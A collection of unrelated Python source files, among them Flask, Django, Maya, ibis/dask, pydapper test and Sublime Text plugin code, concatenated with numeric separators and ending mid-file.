return jsonify(response)
@bp.app_context_processor
def pusher_data():
return {
"PUSHER_KEY": self.client.key
}
def _sign(self, message):
return sign(self.client.secret, message)
def _verify(self, message, signature):
if not signature:
return False
return verify(self.client.secret, message, signature)
def _auth_simple(self, socket_id, channel_name):
if not self._auth_handler(channel_name, socket_id):
return None
return self._auth_key(socket_id, channel_name)
def _auth_buffered(self, socket_id):
response = {}
while True:
n = len(response)
channel_name = request.form.get("channel_name[%d]" % n)
if not channel_name:
if n == 0:
# it is not a buffered request
abort(400)
break
r = {}
auth = self._auth_simple(socket_id, channel_name)
if auth:
r.update(status=200, data=auth)
else:
r.update(status=403)
response[channel_name] = r
return response
def _auth_key(self, socket_id, channel_name):
if channel_name.startswith("presence-"):
channel_data = {"user_id": socket_id}
if self._channel_data_handler:
d = self._channel_data_handler(channel_name, socket_id)
channel_data.update(d)
auth_args = [socket_id, channel_data]
elif channel_name.startswith("private-"):
auth_args = [socket_id]
else:
# must never happen, this request is not from pusher
abort(404)
return self.client.authenticate(channel_name, *auth_args)
class Webhooks(object):
CHANNEL_EXISTENCE_EVENT = "channel_existence"
PRESENCE_EVENT = "presence"
CLIENT_EVENT = "client"
def __init__(self, pusher):
self.pusher = pusher
self._handlers = {}
self._register(self.CHANNEL_EXISTENCE_EVENT)
self._register(self.PRESENCE_EVENT)
self._register(self.CLIENT_EVENT)
def channel_existence(self, func):
self._handlers[self.CHANNEL_EXISTENCE_EVENT] = func
return func
def presence(self, func):
self._handlers[self.PRESENCE_EVENT] = func
return func
def client(self, func):
self._handlers[self.CLIENT_EVENT] = func
return func
def _register(self, event):
def route():
func = self._handlers.get(event)
if not func:
abort(404)
self._validate()
func()
return "OK", 200
rule = "/events/%s" % event
name = "%s_event" % event
self.pusher._blueprint.add_url_rule(rule, name, route,
methods=["POST"])
def _validate(self):
pusher_key = request.headers.get("X-Pusher-Key")
if pusher_key != self.pusher.client.key:
# invalid pusher key
abort(403)
webhook_signature = request.headers.get("X-Pusher-Signature")
if not self.pusher._verify(request.data.decode(), webhook_signature):
# invalid signature
abort(403)
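# A minimal usage sketch (not part of the original module, guarded so it only runs as a
# script): it wires the extension above into a Flask app and registers auth, channel_data
# and webhook handlers. The app config values and the "allow everything" auth rule are
# illustrative assumptions.
if __name__ == "__main__":  # pragma: no cover
    from flask import Flask

    app = Flask(__name__)
    app.config["PUSHER_APP_ID"] = "my-app-id"
    app.config["PUSHER_KEY"] = "my-key"
    app.config["PUSHER_SECRET"] = "my-secret"
    pusher = Pusher(app)

    @pusher.auth
    def pusher_auth(channel_name, socket_id):
        # allow every private/presence channel (illustrative only)
        return True

    @pusher.channel_data
    def pusher_channel_data(channel_name, socket_id):
        return {"user_info": {"name": "anonymous"}}

    @pusher.webhooks.presence
    def presence_webhook():
        # called after the signature headers have been validated
        print(request.json)

    app.run()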
|
1708866
|
from django.db import models
from django.contrib.auth.models import User
from django.urls import reverse
class Project(models.Model):
name = models.CharField(max_length=128)
description = models.TextField(default="", blank=True)
members = models.ManyToManyField(User, through="Membership")
created_by = models.ForeignKey(User, on_delete=models.CASCADE, related_name="owner")
def get_absolute_url(self):
return reverse("project_detail", kwargs={"pk": self.pk})
class Membership(models.Model):
user = models.ForeignKey(User, on_delete=models.CASCADE)
project = models.ForeignKey(Project, on_delete=models.CASCADE)
class Issue(models.Model):
name = models.CharField(max_length=128)
description = models.TextField(default="", blank=True)
assigned_to = models.ForeignKey(
User,
on_delete=models.SET_NULL,
null=True,
blank=True,
related_name="issues_assigned",
)
created_by = models.ForeignKey(
User, on_delete=models.CASCADE, related_name="issues_created"
)
|
1708869
|
from django.contrib.auth.models import User
from django_tables2 import tables, TemplateColumn
class UserByObjectTable(tables.Table):
actions = TemplateColumn(template_name='custom_columns/user_by_group_actions.html', orderable=False)
role = TemplateColumn(template_name='custom_columns/role_object.html', orderable=False)
class Meta:
model = User
attrs = {"id": "user_by_team_table", "class": "table squest-pagination-tables "}
fields = ("username", "email", "role", "actions")
|
1708877
|
from django.contrib import messages
from django.contrib.auth.mixins import LoginRequiredMixin
from django.shortcuts import redirect, render
from django.urls import reverse
from django.views.generic import DetailView, ListView
from django.views.generic.edit import CreateView, UpdateView
from dfirtrack_main.forms import DomainuserForm
from dfirtrack_main.logger.default_logger import debug_logger
from dfirtrack_main.models import Domainuser
class DomainuserList(LoginRequiredMixin, ListView):
login_url = '/login'
model = Domainuser
template_name = 'dfirtrack_main/domainuser/domainuser_list.html'
context_object_name = 'domainuser_list'
def get_queryset(self):
debug_logger(str(self.request.user), " DOMAINUSER_LIST_ENTERED")
return Domainuser.objects.order_by('domainuser_name')
class DomainuserDetail(LoginRequiredMixin, DetailView):
login_url = '/login'
model = Domainuser
template_name = 'dfirtrack_main/domainuser/domainuser_detail.html'
def get_context_data(self, **kwargs):
context = super().get_context_data(**kwargs)
domainuser = self.object
domainuser.logger(str(self.request.user), " DOMAINUSER_DETAIL_ENTERED")
return context
class DomainuserCreate(LoginRequiredMixin, CreateView):
login_url = '/login'
model = Domainuser
form_class = DomainuserForm
template_name = 'dfirtrack_main/generic_form.html'
def get(self, request, *args, **kwargs):
form = self.form_class()
debug_logger(str(request.user), " DOMAINUSER_ADD_ENTERED")
return render(
request,
self.template_name,
{
'form': form,
'title': 'Add',
'object_type': 'domainuser',
},
)
def post(self, request, *args, **kwargs):
form = self.form_class(request.POST)
if form.is_valid():
domainuser = form.save(commit=False)
domainuser.save()
form.save_m2m()
domainuser.logger(str(request.user), " DOMAINUSER_ADD_EXECUTED")
messages.success(request, 'Domainuser added')
return redirect(
reverse('domainuser_detail', args=(domainuser.domainuser_id,))
)
else:
return render(
request,
self.template_name,
{
'form': form,
'title': 'Add',
'object_type': 'domainuser',
},
)
class DomainuserUpdate(LoginRequiredMixin, UpdateView):
login_url = '/login'
model = Domainuser
form_class = DomainuserForm
template_name = 'dfirtrack_main/generic_form.html'
def get(self, request, *args, **kwargs):
domainuser = self.get_object()
form = self.form_class(instance=domainuser)
domainuser.logger(str(request.user), " DOMAINUSER_EDIT_ENTERED")
return render(
request,
self.template_name,
{
'form': form,
'title': 'Edit',
'object_type': 'domainuser',
'object_name': domainuser.domainuser_name,
},
)
def post(self, request, *args, **kwargs):
domainuser = self.get_object()
form = self.form_class(request.POST, instance=domainuser)
if form.is_valid():
domainuser = form.save(commit=False)
domainuser.save()
form.save_m2m()
domainuser.logger(str(request.user), " DOMAINUSER_EDIT_EXECUTED")
messages.success(request, 'Domainuser edited')
return redirect(
reverse('domainuser_detail', args=(domainuser.domainuser_id,))
)
else:
return render(
request,
self.template_name,
{
'form': form,
'title': 'Edit',
'object_type': 'domainuser',
'object_name': domainuser.domainuser_name,
},
)
|
1708906
|
import sys
import math
import numpy as np
try:
    from scipy.spatial import cKDTree as kd_tree
except ImportError:
    # fall back to the pure-python KDTree if cKDTree is unavailable
    from scipy.spatial import KDTree as kd_tree
import maya.OpenMaya as om
import logging_util
# import progress_bar
class GeoCache(object):
"""
container for cached triangulated geometry
note: no extra type checking or error handling is done!
"""
def __init__(self):
log_lvl = sys._global_spore_dispatcher.spore_globals['LOG_LEVEL']
self.logger = logging_util.SporeLogger(__name__, log_lvl)
self.p0 = om.MPointArray()
self.p1 = om.MPointArray()
self.p2 = om.MPointArray()
self.normals = om.MVectorArray()
self.poly_id = om.MIntArray()
self.AB = om.MVectorArray()
self.AC = om.MVectorArray()
self.poly_verts = om.MPointArray()
self.uv_kd_tree = None
self.neighbor_lookup = {}
self.mesh = None
self.cached = True
self.weighted_ids = []
# @progress_bar.ProgressBar('Caching Geometry...')
def cache_geometry(self, mesh):
""" cache the given geometry
:param mesh: the mesh which will be cached
:type mesh: MDagPath to the mesh """
self.flush_cache()
self.mesh = mesh
self.logger.debug('Cache geometry: {}'.format(mesh.fullPathName())) # TODO - get node name
# in_mesh = node_utils.get_connected_in_mesh(self.thisMObject(), False)
mesh_fn = om.MFnMesh(self.mesh)
# num_polys = mesh_fn.numPolygons() # TODO - get in mesh fn
# num_iter = num_polys / 100
# store ferts for validating the cache later
mesh_fn.getPoints(self.poly_verts)
# get bb in world space
dag_fn = om.MFnDagNode(self.mesh)
bb = dag_fn.boundingBox()
inv_matrix = self.mesh.exclusiveMatrix()
bb.transformUsing(inv_matrix)
# initialize triangle data
tri_points = om.MPointArray()
vert_ids = om.MIntArray()
tris_area = []
smallest_tri = None
# iter mesh
poly_iter = om.MItMeshPolygon(self.mesh)
while not poly_iter.isDone():
# get face triangles
poly_index = poly_iter.index()
poly_iter.getTriangles(tri_points, vert_ids, om.MSpace.kWorld)
# get triangle data
for i in xrange(tri_points.length() / 3):
p0 = tri_points[i * 3]
p1 = tri_points[i * 3 + 1]
p2 = tri_points[i * 3 + 2]
area, AB, AC, normal = self.get_triangle_area(p0, p1, p2)
if smallest_tri is None or area < smallest_tri:
smallest_tri = area
tris_area.append(area)
self.cache = (p0, p1, p2, normal, poly_index, AB, AC)
# update progressbar
# if poly_index >= num_iter:
# self.cache_geometry.increment()
# num_iter += num_polys / 100
poly_iter.next()
probability = [int(math.ceil(area / smallest_tri)) for area in tris_area]
[self.weighted_ids.extend([idx] * chance) for idx, chance in enumerate(probability)]
self.cached = True
def get_triangle_area(self, p0, p1, p2):
"""
return size of a triangle and the vector p1-p0 and p2-p0
:param p0: MPoint 1
:param p1: MPoint 2
:param p2: MPoint 3
:return: triangle area, vector AB, vector AC, and the normalized triangle normal
"""
AB = om.MVector(p1 - p0)
AC = om.MVector(p2 - p0)
normal = (AB ^ AC)
# actually the real surface area is area/2
# but since all tris are handled the same way it does not make any difference
# hence I can save computation by omitting area/2
area = math.sqrt(normal[0] ** 2 + normal[1] ** 2 + normal[2] ** 2)
normal.normalize()
return area, AB, AC, normal
def create_uv_lookup(self):
""" create a dict with an entry for every vertex and a list of
neighbouring faces as well as a kd tree to look up close face ids """
self.logger.debug('Create UV lookup for the current GeoCache')
util = om.MScriptUtil()
connected_faces = om.MIntArray()
mesh_fn = om.MFnMesh(self.mesh)
num_verts = mesh_fn.numVertices()
points = np.zeros(shape=(num_verts, 2))
vert_iter = om.MItMeshVertex(self.mesh)
while not vert_iter.isDone():
index = vert_iter.index()
vert_iter.getConnectedFaces(connected_faces)
self.neighbor_lookup[index] = [connected_faces[i] for i in xrange(connected_faces.length())]
util.createFromDouble(0.0, 0.0)
uv_ptr = util.asFloat2Ptr()
vert_iter.getUV(uv_ptr)
u_coord = util.getFloat2ArrayItem(uv_ptr, 0, 0)
v_coord = util.getFloat2ArrayItem(uv_ptr, 0, 1)
points[index] = (u_coord, v_coord)
vert_iter.next()
self.uv_kd_tree = kd_tree(points)
def get_close_face_ids(self, u_coord, v_coord):
""" get a list of neighbour face ids to the give u and v coords """
distance, index = self.uv_kd_tree.query((u_coord, v_coord), 1)
return self.neighbor_lookup[index]
def validate_cache(self):
""" check if the current cache is valid """
points = om.MPointArray()
mesh_fn = om.MFnMesh(self.mesh)
mesh_fn.getPoints(points)
if points.length() != self.poly_verts.length():
    self.logger.debug('Validate GeoCache failed')
    return False
for i in xrange(points.length()):
if points[i] != self.poly_verts[i]:
self.logger.debug('Validate GeoCache failed')
return False
return True
"""
index = 0
tri_points = om.MPointArray()
tri_ids = om.MIntArray()
poly_iter = om.MItMeshPolygon(self.mesh)
while not poly_iter.isDone():
# get face triangles
poly_index = poly_iter.index()
poly_iter.getTriangles(tri_points, tri_ids, om.MSpace.kWorld)
# get triangle data
for i in xrange(tri_points.length() / 3):
# assert self.p0[i * 3] == tri_points[i * 3]
# assert self.p1[i * 3 + 1] == tri_points[i * 3 + 1]
# assert self.p2[i * 3 + 2] == tri_points[i * 3 + 2]
print self.p0[i*3].x, tri_points[i*3].x
print self.p0[i*3].y, tri_points[i*3].y
print self.p0[i*3].z, tri_points[i*3].z
print '-'
print self.p0[i*3+1].x, tri_points[i*3+1].x
print self.p0[i*3+1].y, tri_points[i*3+1].y
print self.p0[i*3+1].z, tri_points[i*3+1].z
print '-'
print self.p0[i*3+2].x, tri_points[i*3+2].x
print self.p0[i*3+2].y, tri_points[i*3+2].y
print self.p0[i*3+2].z, tri_points[i*3+2].z
# except AssertionError:
# return False
index += 1
poly_iter.next()
return True
"""
################################################################################################
# cache property
################################################################################################
@property
def cache(self):
""" cache getter
:return: tuple of entire geo cache:
id content data type
0 - p0 - MPointArray
1 - p1 - MPointArray
2 - p2 - MPointArray
3 - face normal - MVectorArray
4 - polygon id - MIntArray
5 - vector AB - MVectorArray
6 - vector AC - MVectorArray
"""
return self.p0,\
self.p1,\
self.p2,\
self.normals,\
self.poly_id,\
self.AB,\
self.AC
@cache.setter
def cache(self, triangle):
""" cache setter
append one triangle to the end of the current cache
:param triangle: argument must be of type tuple or list
it must consist of the following items in the exact same order:
id content data type
0 - p0 - MPoint
1 - p1 - MPoint
2 - p2 - MPoint
3 - face normal - MVector
4 - polygon id - int
5 - vector AB - MVector
6 - vector AC - MVector
note: no error or type checking is done!
"""
self.p0.append(triangle[0])
self.p1.append(triangle[1])
self.p2.append(triangle[2])
self.normals.append(triangle[3])
self.poly_id.append(int(triangle[4]))
self.AB.append(triangle[5])
self.AC.append(triangle[6])
def flush_cache(self):
self.logger.debug('Flush GeoCache')
self.p0 = om.MPointArray()
self.p1 = om.MPointArray()
self.p2 = om.MPointArray()
self.normals = om.MVectorArray()
self.poly_id = om.MIntArray()
self.AB = om.MVectorArray()
self.AC = om.MVectorArray()
self.cached = False
def __len__(self):
return self.p0.length()
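# Typical use (illustrative sketch, only meaningful inside Maya with the spore plug-in
# loaded, since __init__ reads sys._global_spore_dispatcher): cache a mesh once, build the
# UV lookup, then query nearby face ids for a UV coordinate.
#
#     cache = GeoCache()
#     cache.cache_geometry(mesh_dag_path)  # MDagPath to the mesh
#     cache.create_uv_lookup()
#     face_ids = cache.get_close_face_ids(0.5, 0.5)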
|
1708929
|
from django.conf.urls import patterns, include, url
urlpatterns = patterns('exam.views',
url(r'^$', 'index'),
url(r'^login/$', 'user_login'),
url(r'^quizzes/$','quizlist_user'),
url(r'^results/$','results_user'),
url(r'^start/$', 'start'),
url(r'^start/(?P<questionpaper_id>\d+)/$','start'),
url(r'^quit/(?P<questionpaper_id>\d+)/$', 'quit'),
url(r'^intro/(?P<questionpaper_id>\d+)/$','intro'),
url(r'^complete/$', 'complete'),
url(r'^complete/(?P<questionpaper_id>\d+)/$', 'complete'),
url(r'^register/$', 'user_register'),
url(r'^(?P<q_id>\d+)/$', 'question'),
url(r'^(?P<q_id>\d+)/check/$', 'check'),
url(r'^(?P<q_id>\d+)/check/(?P<questionpaper_id>\d+)/$', 'check'),
url(r'^intro/$', 'start'),
url(r'^manage/$', 'prof_manage'),
url(r'^manage/addquestion/$', 'add_question'),
url(r'^manage/addquestion/(?P<question_id>\d+)/$', 'add_question'),
url(r'^manage/addquiz/$', 'add_quiz'),
url(r'^manage/editquiz/$', 'edit_quiz'),
url(r'^manage/editquestion/$', 'edit_question'),
url(r'^manage/addquiz/(?P<quiz_id>\d+)/$', 'add_quiz'),
url(r'^manage/gradeuser/$', 'show_all_users'),
url(r'^manage/gradeuser/(?P<username>[a-zA-Z0-9_.]+)/$', 'grade_user'),
url(r'^manage/questions/$', 'show_all_questions'),
url(r'^manage/showquiz/$','show_all_quiz'),
url(r'^manage/monitor/$', 'monitor'),
url(r'^manage/showquestionpapers/$','show_all_questionpapers'),
url(r'^manage/showquestionpapers/(?P<questionpaper_id>\d+)/$',\
'show_all_questionpapers'),
url(r'^manage/monitor/(?P<questionpaper_id>\d+)/$', 'monitor'),
url(r'^manage/user_data/(?P<username>[a-zA-Z0-9_.]+)/$','user_data'),
url(r'^manage/designquestionpaper/$','design_questionpaper'),
url(r'^manage/designquestionpaper/(?P<questionpaper_id>\d+)/$',\
'design_questionpaper'),
url(r'^manage/designquestionpaper/automatic/(?P<questionpaper_id>\d+)/$',\
'automatic_questionpaper'),
url(r'^manage/designquestionpaper/automatic$','automatic_questionpaper'),
url(r'^manage/designquestionpaper/manual$','manual_questionpaper'),
url(r'^manage/designquestionpaper/manual/(?P<questionpaper_id>\d+)/$',\
'manual_questionpaper'),
url(r'^ajax/questionpaper/(?P<query>.+)/$', 'ajax_questionpaper'),
)
|
1708984
|
from wrapper import *
from goto import *
@with_goto
def all_code():
clear_all_execution()
exec_sql('CREATE DATABASE IF NOT EXISTS test;')
exec_sql('USE test;')
exec_sql(
'create table tbcalifica'
'( iditem integer not null primary key,'
'item varchar(150) not null,'
'puntos float not null );'
)
exec_sql('insert into tbcalifica(iditem, item, puntos) values (1,\'Funcionalidades básicas\',2.0);')
t1 = 1 + 1
exec_sql(f'insert into tbcalifica(iditem, item, puntos) values ({t1},\'Funcionalidades X\',3.0);')
exec_sql(f'insert into tbcalifica(iditem, item, puntos) values (3*2,\'Funcionalidades Meh\',4.0);')
result = []
i = 1
stop = 5
label.begin
if i == stop:
goto.end
result.append(i)
i += 1
goto.begin
label.end
print(result)
all_code()
report_stored_st()
|
1708987
|
from django.test import TestCase
from . import country
class TestCountry(TestCase):
def test_activate_deactivate_country(self):
self.assertIsNone(country.get_country())
country.activate('us')
self.assertEqual(country.get_country(), 'us')
country.activate('ca')
self.assertEqual(country.get_country(), 'ca')
country.deactivate()
self.assertIsNone(country.get_country())
def test_activate_checks_country(self):
with self.assertRaises(ValueError):
country.activate(None)
with self.assertRaises(ValueError):
country.activate('br')
self.assertIsNone(country.get_country())
def test_override_country(self):
self.assertIsNone(country.get_country())
with country.override('us'):
self.assertEqual(country.get_country(), 'us')
with country.override('ca'):
self.assertEqual(country.get_country(), 'ca')
self.assertEqual(country.get_country(), 'us')
self.assertIsNone(country.get_country())
|
1708995
|
import os
from azure.cognitiveservices.search.autosuggest import AutoSuggestClient
from msrest.authentication import CognitiveServicesCredentials
'''
Microsoft Azure Cognitive Services - Bing Autosuggest - Get Search Suggestions
Uses the general Cognitive Services key/endpoint. It's used when you want to
combine many Cognitive Services with just one authentication key/endpoint.
Services are not combined here, but could be potentially.
Install the Cognitive Services Bing Autosuggest SDK module:
python -m pip install azure-cognitiveservices-search-autosuggest
Use Python 3.4+
'''
subscription_key = "PASTE_YOUR_AUTO_SUGGEST_SUBSCRIPTION_KEY_HERE"
endpoint = "PASTE_YOUR_AUTO_SUGGEST_ENDPOINT_HERE"
'''
AUTHENTICATE
Create an Autosuggest client.
'''
credentials = CognitiveServicesCredentials(subscription_key)
autosuggest_client = AutoSuggestClient(endpoint, credentials)
'''
AUTOSUGGEST
This example uses a query term to search for autocompletion suggestions for the term.
'''
# Returns from the Suggestions class
result = autosuggest_client.auto_suggest('sail')
# Access all suggestions
suggestions = result.suggestion_groups[0]
# print results
for suggestion in suggestions.search_suggestions:
print(suggestion.query)
print(suggestion.display_text)
|
1709003
|
from cospar.tool._clone import *
from cospar.tool._gene import *
from cospar.tool._map import *
from cospar.tool._utils import *
|
1709055
|
import datetime
from decimal import Decimal
import pytest
from pymssql import _pymssql
from pydapper import connect
from pydapper import using
from pydapper.mssql.pymssql import PymssqlCommands
from tests.suites.commands import ExecuteScalarTestSuite
from tests.suites.commands import ExecuteTestSuite
from tests.suites.commands import QueryFirstOrDefaultTestSuite
from tests.suites.commands import QueryFirstTestSuite
from tests.suites.commands import QueryMultipleTestSuite
from tests.suites.commands import QuerySingleOrDefaultTestSuite
from tests.suites.commands import QuerySingleTestSuite
from tests.suites.commands import QueryTestSuite
@pytest.fixture(scope="function")
def commands(server, database_name) -> PymssqlCommands:
with PymssqlCommands(
_pymssql.connect(server=server, port=1434, password="<PASSWORD>", user="sa", database=database_name)
) as commands:
yield commands
def test_using(server, database_name):
with using(
_pymssql.connect(server=server, port=1434, password="<PASSWORD>", user="sa", database=database_name)
) as commands:
assert isinstance(commands, PymssqlCommands)
@pytest.mark.parametrize("driver", ["mssql", "mssql+pymssql"])
def test_connect(driver, database_name, server):
with connect(f"{driver}://sa:pydapper!PYDAPPER@{server}:1434/{database_name}") as commands:
assert isinstance(commands, PymssqlCommands)
class TestParamHandler:
@pytest.mark.parametrize(
"param, expected",
[
({"test": 1}, "%d"),
({"test": Decimal("5.6750000")}, "%d"),
({"test": datetime.date.today()}, "%s"),
([{"test": datetime.date.today()}, {"test": datetime.datetime.today()}], "%s"),
],
)
def test_get_param_value(self, param, expected):
handler = PymssqlCommands.SqlParamHandler("", param)
assert handler.get_param_placeholder("test") == expected
class TestExecute(ExecuteTestSuite):
...
class TestQuery(QueryTestSuite):
...
class TestQueryMultiple(QueryMultipleTestSuite):
...
class TestQueryFirst(QueryFirstTestSuite):
...
class TestQueryFirstOrDefault(QueryFirstOrDefaultTestSuite):
...
class TestQuerySingle(QuerySingleTestSuite):
...
class TestQuerySingleOrDefault(QuerySingleOrDefaultTestSuite):
...
class TestExecuteScalar(ExecuteScalarTestSuite):
...
|
1709058
|
import itertools
import dask.dataframe as dd
import dask.dataframe.groupby as ddgb
import numpy as np
import pandas
import toolz
from pandas import isnull
import ibis
import ibis.expr.operations as ops
from ibis.backends.pandas.core import integer_types, scalar_types
from ibis.backends.pandas.execution.strings import (
execute_series_join_scalar_sep,
execute_series_regex_extract,
execute_series_regex_replace,
execute_series_regex_search,
execute_series_right,
execute_series_translate_scalar_scalar,
execute_series_translate_scalar_series,
execute_series_translate_series_scalar,
execute_series_translate_series_series,
execute_string_capitalize,
execute_string_contains,
execute_string_length_series,
execute_string_like_series_string,
execute_string_lower,
execute_string_lpad,
execute_string_lstrip,
execute_string_repeat,
execute_string_reverse,
execute_string_rpad,
execute_string_rstrip,
execute_string_strip,
execute_string_upper,
execute_substring_int_int,
haystack_to_series_of_lists,
)
from ..dispatch import execute_node
from .util import (
TypeRegistrationDict,
make_selected_obj,
register_types_to_dispatcher,
)
DASK_DISPATCH_TYPES: TypeRegistrationDict = {
ops.StringLength: [((dd.Series,), execute_string_length_series)],
ops.Substring: [
(
(
dd.Series,
integer_types,
integer_types,
),
execute_substring_int_int,
),
],
ops.Strip: [((dd.Series,), execute_string_strip)],
ops.LStrip: [((dd.Series,), execute_string_lstrip)],
ops.RStrip: [((dd.Series,), execute_string_rstrip)],
ops.LPad: [
(
(
dd.Series,
(dd.Series,) + integer_types,
(dd.Series, str),
),
execute_string_lpad,
),
],
ops.RPad: [
(
(
dd.Series,
(dd.Series,) + integer_types,
(dd.Series, str),
),
execute_string_rpad,
),
],
ops.Reverse: [((dd.Series,), execute_string_reverse)],
ops.Lowercase: [((dd.Series,), execute_string_lower)],
ops.Uppercase: [((dd.Series,), execute_string_upper)],
ops.Capitalize: [((dd.Series,), execute_string_capitalize)],
ops.Repeat: [
((dd.Series, (dd.Series,) + integer_types), execute_string_repeat),
],
ops.StringFind: [
(
(
dd.Series,
(dd.Series, str),
(dd.Series, type(None)) + integer_types,
(dd.Series, type(None)) + integer_types,
),
execute_string_contains,
)
],
ops.StringSQLLike: [
(
(
dd.Series,
str,
(str, type(None)),
),
execute_string_like_series_string,
),
],
ops.RegexSearch: [
(
(
dd.Series,
str,
),
execute_series_regex_search,
)
],
ops.RegexExtract: [
(
(dd.Series, (dd.Series, str), integer_types),
execute_series_regex_extract,
),
],
ops.RegexReplace: [
(
(
dd.Series,
str,
str,
),
execute_series_regex_replace,
),
],
ops.Translate: [
(
(dd.Series, dd.Series, dd.Series),
execute_series_translate_series_series,
),
((dd.Series, dd.Series, str), execute_series_translate_series_scalar),
((dd.Series, str, dd.Series), execute_series_translate_scalar_series),
((dd.Series, str, str), execute_series_translate_scalar_scalar),
],
ops.StrRight: [((dd.Series, integer_types), execute_series_right)],
ops.StringJoin: [
(((dd.Series, str), list), execute_series_join_scalar_sep),
],
}
register_types_to_dispatcher(execute_node, DASK_DISPATCH_TYPES)
@execute_node.register(ops.Substring, dd.Series, dd.Series, integer_types)
def execute_substring_series_int(op, data, start, length, **kwargs):
return execute_substring_series_series(
op, data, start, dd.from_array(np.repeat(length, len(start))), **kwargs
)
@execute_node.register(ops.Substring, dd.Series, integer_types, dd.Series)
def execute_string_substring_int_series(op, data, start, length, **kwargs):
return execute_substring_series_series(
op,
data,
dd.from_array(np.repeat(start, len(length))),
length,
**kwargs,
)
# TODO - substring - #2553
@execute_node.register(ops.Substring, dd.Series, dd.Series, dd.Series)
def execute_substring_series_series(op, data, start, length, **kwargs):
end = start + length
# TODO - this is broken
def iterate(
value,
start_iter=start.iteritems(),
end_iter=end.iteritems(),
):
_, begin = next(start_iter)
_, end = next(end_iter)
if (begin is not None and isnull(begin)) or (
end is not None and isnull(end)
):
return None
return value[begin:end]
return data.map(iterate)
@execute_node.register(ops.StringSQLLike, ddgb.SeriesGroupBy, str, str)
def execute_string_like_series_groupby_string(
op, data, pattern, escape, **kwargs
):
return execute_string_like_series_string(
op, make_selected_obj(data), pattern, escape, **kwargs
).groupby(data.grouper.groupings)
# TODO - aggregations - #2553
@execute_node.register(
ops.GroupConcat, dd.Series, str, (dd.Series, type(None))
)
def execute_group_concat_series_mask(
op, data, sep, mask, aggcontext=None, **kwargs
):
return aggcontext.agg(
data[mask] if mask is not None else data,
lambda series, sep=sep: sep.join(series.values),
)
@execute_node.register(ops.GroupConcat, ddgb.SeriesGroupBy, str, type(None))
def execute_group_concat_series_gb(
op, data, sep, _, aggcontext=None, **kwargs
):
custom_group_concat = dd.Aggregation(
name='custom_group_concat',
chunk=lambda s: s.apply(list),
agg=lambda s0: s0.apply(
lambda chunks: sep.join(
str(s) for s in itertools.chain.from_iterable(chunks)
)
),
)
return data.agg(custom_group_concat)
# TODO - aggregations - #2553
@execute_node.register(
ops.GroupConcat, ddgb.SeriesGroupBy, str, ddgb.SeriesGroupBy
)
def execute_group_concat_series_gb_mask(
op, data, sep, mask, aggcontext=None, **kwargs
):
def method(series, sep=sep):
return sep.join(series.values.astype(str))
return aggcontext.agg(
data,
lambda data, mask=mask.obj, method=method: method(
data[mask[data.index]]
),
)
@execute_node.register(ops.StringAscii, dd.Series)
def execute_string_ascii(op, data, **kwargs):
output_meta = pandas.Series([], dtype=np.dtype('int32'), name=data.name)
return data.map(ord, meta=output_meta)
@execute_node.register(ops.StringAscii, ddgb.SeriesGroupBy)
def execute_string_ascii_group_by(op, data, **kwargs):
return execute_string_ascii(op, make_selected_obj(data), **kwargs).groupby(
data.index
)
@execute_node.register(ops.RegexSearch, ddgb.SeriesGroupBy, str)
def execute_series_regex_search_gb(op, data, pattern, **kwargs):
return execute_series_regex_search(
op,
make_selected_obj(data),
getattr(pattern, 'obj', pattern),
**kwargs,
).groupby(data.index)
@execute_node.register(
ops.RegexExtract, ddgb.SeriesGroupBy, str, integer_types
)
def execute_series_regex_extract_gb(op, data, pattern, index, **kwargs):
return execute_series_regex_extract(
op, make_selected_obj(data), pattern, index, **kwargs
).groupby(data.index)
@execute_node.register(ops.RegexReplace, ddgb.SeriesGroupBy, str, str)
def execute_series_regex_replace_gb(op, data, pattern, replacement, **kwargs):
return execute_series_regex_replace(
make_selected_obj(data), pattern, replacement, **kwargs
).groupby(data.index)
@execute_node.register(ops.StrRight, ddgb.SeriesGroupBy, integer_types)
def execute_series_right_gb(op, data, nchars, **kwargs):
return execute_series_right(op, make_selected_obj(data), nchars).groupby(
data.index
)
def haystack_to_dask_series_of_lists(haystack, index=None):
pieces = haystack_to_series_of_lists(haystack, index)
return dd.from_pandas(pieces, npartitions=1)
@execute_node.register(ops.FindInSet, dd.Series, list)
def execute_series_find_in_set(op, needle, haystack, **kwargs):
def find_in_set(index, elements):
return ibis.util.safe_index(elements, index)
return needle.apply(find_in_set, args=(haystack,))
@execute_node.register(ops.FindInSet, ddgb.SeriesGroupBy, list)
def execute_series_group_by_find_in_set(op, needle, haystack, **kwargs):
pieces = [getattr(piece, 'obj', piece) for piece in haystack]
return execute_series_find_in_set(
op, make_selected_obj(needle), pieces, **kwargs
).groupby(needle.index)
# TODO we need this version not pandas
@execute_node.register(ops.FindInSet, scalar_types, list)
def execute_string_group_by_find_in_set(op, needle, haystack, **kwargs):
# `list` could contain series, series groupbys, or scalars
# mixing series and series groupbys is not allowed
series_in_haystack = [
type(piece)
for piece in haystack
if isinstance(piece, (dd.Series, ddgb.SeriesGroupBy))
]
if not series_in_haystack:
return ibis.util.safe_index(haystack, needle)
try:
(collection_type,) = frozenset(map(type, series_in_haystack))
except ValueError:
raise ValueError('Mixing Series and ddgb.SeriesGroupBy is not allowed')
pieces = haystack_to_dask_series_of_lists(
[getattr(piece, 'obj', piece) for piece in haystack]
)
result = pieces.map(toolz.flip(ibis.util.safe_index)(needle))
if issubclass(collection_type, dd.Series):
return result
assert issubclass(collection_type, ddgb.SeriesGroupBy)
return result.groupby(
toolz.first(
piece.grouper.groupings
for piece in haystack
if hasattr(piece, 'grouper')
)
)
|
1709064
|
import os
import random
listdir = os.listdir('/media/dsg3/datasets/SIXray/Annotation')
test = random.sample(listdir, 200)
train = [x for x in listdir if x not in test]
with open('dataset-train.txt', 'w') as f:
for item in train:
f.write('{0}\n'.format(os.path.splitext(item)[0]))
with open('dataset-test.txt', 'w') as f:
for item in test:
f.write('{0}\n'.format(os.path.splitext(item)[0]))
|
1709072
|
import re
import sublime
from ..logging import logger
from ..view import MdeTextCommand
class MdeChangeHeadingsLevelCommand(MdeTextCommand):
"""
The `mde_change_headings_level` command sets heading levels to an absolute
value or changes them by a relative amount.
1. Carets are moved to the beginning of each header label.
2. Indentation level is kept intact.
3. Works within block quotes.
4. Respects `mde.match_heading_hashes` setting.
Absolute:
```json
{ "command": "mde_change_headings_level", "args": {"to": 2, "select": false} }
```
Relative:
```json
{ "command": "mde_change_headings_level", "args": {"by": -1, "select": false} }
```
"""
MAX_LEVEL = 6
def description(self):
# Used as the name for Undo.
return "Change Headings Level"
def run(self, edit, to=None, by=None, select=False):
"""
Execute `mde_change_headings_level`
:param edit: The edit token
